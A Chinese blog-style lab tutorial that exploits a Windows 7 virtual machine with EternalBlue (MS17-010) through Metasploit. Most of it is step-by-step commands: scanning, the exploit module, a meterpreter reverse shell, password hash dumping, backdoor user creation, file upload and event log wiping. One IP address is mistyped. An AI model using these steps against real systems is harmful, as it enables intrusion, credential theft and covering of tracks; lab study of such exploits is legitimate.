本文主要是介绍利用EternalBlue控制win7虚拟机,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
利用EternalBlue控制win7虚拟机
WannaCry
https://www.sogou.com/link?url=DOb0bgH2eKjRiy6S-EyBciCDFRTZxEJgIH83_ioKlBAYUPdjyPzg-xvT47fi1v8bLv_Z_c0A1BdCJFQqz9HOu_13O0P_SOdx7XzrA381xFT2UTfnzsf64g…
http://blogs.360.cn/post/eternalblue_to_ransomware.html
EternalBlue
http://blogs.360.cn/post/nsa-eternalblue-smb.html
445端口
https://baike.baidu.com/item/445%E7%AB%AF%E5%8F%A3/3519185?fr=aladdin
使用工具
Metasploit
快速入门:
https://www.baidu.com/link?url=p62q40-hOOuX4nKi9g9LLqv_OYcrG392HMxX_P2wYhZXvnEMfjc8sgXC6yJ8F8bz&wd=&eqid=cd9a049f002c287d000000045db58842
用法大全:
https://blog.csdn.net/yanlongge/article/details/89490822
环境配置
靶机:Windows 7 x64虚拟机,IP地址为192.168.145.141
本机:Kali Linux,IP地址为192.168.145.134
控制过程
- 查询两台虚拟机的IP地址

- 确认win 7靶机是否开放445端口
nmap -sV 192.168.145.141

- 进入metaploit,利用msf的auxiliaty验证漏洞
msfconsole
search ms17-010



- 验证漏洞是否可利用
use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.145.141
set rport 445
run

- 设置好靶机地址、攻击端口和本机地址
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.145.141
set rport 445
set lhost 192168.145.134

- 使用payload攻击
set payload windows/x64/meterpreter/reverse_tcp

- 枪已上膛,最后检查一下配置
show options


- 冲啊!!!
run

- PWN!!!返回控制通道

搞破坏
- 获取用户Hash值
hashdump

- 获取system权限
sysinfo

- 创建新用户
net user [用户名] /add

去win 7验证一下:

- 上传文件
upload [文件] [靶机路径]

去win 7验证一下:


- 清除事件日志
clearev

这篇关于利用EternalBlue控制win7虚拟机的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!